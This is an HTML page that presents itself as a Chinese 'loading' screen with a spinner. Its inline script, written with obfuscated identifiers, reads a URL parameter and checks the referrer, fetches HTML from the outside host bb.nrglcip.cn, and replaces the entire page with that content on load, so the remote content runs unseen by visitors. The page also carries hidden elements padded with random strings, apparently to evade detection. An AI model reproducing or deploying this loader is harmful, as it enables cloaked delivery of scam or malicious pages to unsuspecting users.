<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .MBENTRpM {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .MBENTRpM .K4h0uV {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .MBENTRpM .content {
            line-height: 50px;
            text-align: center
        }

        .MBENTRpM .img {
            width: 100%
        }

        .MBENTRpM .JtxfST {
            text-align: center
        }

        .MBENTRpM .JtxfST span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .MBENTRpM .JtxfST span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .MBENTRpM .JtxfST span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .MBENTRpM .JtxfST span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .MBENTRpM .JtxfST span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .MBENTRpM .JtxfST span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .MBENTRpM .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function oZ6CP1CxjC(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var drOHma = oZ6CP1CxjC('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ drOHma +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ drOHma +".html?a=share";
		}
		
        eYlke9sw=url+"#"+new Date().getTime();
        eYlke9sw && function() {
            $.get(eYlke9sw, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >KPWGwlKp8Y4bayA82QCdOdwjTOK50ROiVKdayeb6kudvkn6xAoEWt0g7yahNoY8gt5RQETsv1d33vXJVBy</h1>
<img  src='' style='display:none'>
<div style='display:none'>GeDbC1MteCThMfeMgFjOEQiZE6DvW</div>
<p  style='display:none'>uB2DybRk0ZxHuaYXH7vdo1lYQeRlubJsyl20LFvT3jbsDijfqIu4nGnkQqYk4tVpVYYIGvNPeF2ZVweJcX</p><div class="MBENTRpM">
    <div class="K4h0uV">
        <div class="JtxfST">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >TljClDTf7TarjzAyqJSpe</ul>
<div style='display:none'>HtpYaLY74uqaB</div>
<h1 style='display:none' >pk79MfCKyi3v8BDPCqD8GOD0LGrvIf8a0KV28qFTX7C0ZkPQYAM6BB0zYa</h1>
<b style='display:none' >aVfKraPZk2zg9xZllGqmEMvOPzgB10uPYThh8K</b>
<b style='display:none' >aVfKraPZk2zg9xZllGqmEMvOPzgB10uPYThh8K</b>
<img  src='' style='display:none'>
<ul style='display:none' >TljClDTf7TarjzAyqJSpe</ul>
<div style='display:none'>HtpYaLY74uqaB</div>
<ul style='display:none' >TljClDTf7TarjzAyqJSpe</ul>
<ul style='display:none' >TljClDTf7TarjzAyqJSpe</ul></body>
</html>